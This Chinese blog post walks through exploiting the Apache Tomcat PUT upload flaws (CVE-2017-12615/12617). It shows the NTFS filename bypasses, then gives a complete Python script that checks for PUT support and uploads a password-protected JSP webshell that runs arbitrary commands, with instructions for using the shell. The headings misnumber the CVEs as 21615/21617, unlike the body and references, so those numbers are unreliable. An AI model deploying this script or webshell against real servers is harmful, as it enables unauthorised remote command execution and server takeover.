Apache Tomcat远程代码执行漏洞

主要有两个远程代码执行漏洞

CVE-2017-21615
CVE-2017-21617

相当老的一个漏洞了,考古回来总结一下:)

可以通过精心构造的攻击请求,向用户服务器上传恶意 JSP 文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码。

官方定义是这样的:

CVE-2017-21615:When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

漏洞环境:

Apache Tomcat 7.0.0-7.0.79

Windows

readonly = false

复现:

首先在web.xml文件中,修改readonly的值为false,默认可能不存在readonly,自行添加代码创建

readonly属性的意思是是否拒绝PUT和DELETE操作,false表示允许此操作

配置保存,然后访问站点(注意端口号的设置)

OPTIONS获取目标站点支持的请求类型,允许PUT操作

BurpSuite抓包,将GET请求改为PUT请求,将代码写入test.jsp

返回404,根据windows特性,NTFS文件流和文件名限制影响(win系统文件名结尾不能为空格),可以绕过限制

添加%20或::$DATA来绕过

可以看到在目录下,已经上传成功两个jsp文件

可以正常访问和返回,可以上传大马代码到jsp文件中

之后出现的CVE-2017-12617与15很相似,Tomcat版本有所区别,利用方法相同

CVE-2017-12617:When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

编写自动化测试和利用脚本

主要原理是测试OPTIONS是否支持PUT操作,然后上传大马

参考了其他人的python脚本,另外在Metasploit中也集成了对此漏洞的支持

#! -*- coding:utf-8 -*- 
import httplib
import sys
import time
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&amp;&amp;!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'''
try:
    conn = httplib.HTTPConnection(sys.argv[1])
    conn.request(method='OPTIONS', url='/ffffzz')
    headers = dict(conn.getresponse().getheaders())
    if 'allow' in headers and \
       headers['allow'].find('PUT') > 0 :
        conn.close()
        conn = httplib.HTTPConnection(sys.argv[1])
        url = "/" + str(int(time.time()))+'.jsp/'
        #url = "/" + str(int(time.time()))+'.jsp::$DATA'
        conn.request( method='PUT', url= url, body=body)
        res = conn.getresponse()
        if res.status  == 201 :
            #print 'shell:', 'http://' + sys.argv[1] + url[:-7]
            print 'shell:', 'http://' + sys.argv[1] + url[:-1]
        elif res.status == 204 :
            print 'file exists'
        else:
            print 'error'
        conn.close()
    else:
        print 'Server not vulnerable'
        
except Exception,e:
    print 'Error:', e

运行测试,当目标站点存在漏洞时,自动生成shell文件,并提示jsp大马文件路径

访问大马,传递参数pwd=[密码]&cmd=[命令]

参考资料:

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12615
  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617
  3. https://paper.seebug.org/398/
  4. https://blog.csdn.net/qq1124794084/article/details/78044756
  5. https://www.freebuf.com/vuls/150203.html
  6. https://www.exploit-db.com/exploits/43008

您可能还喜欢...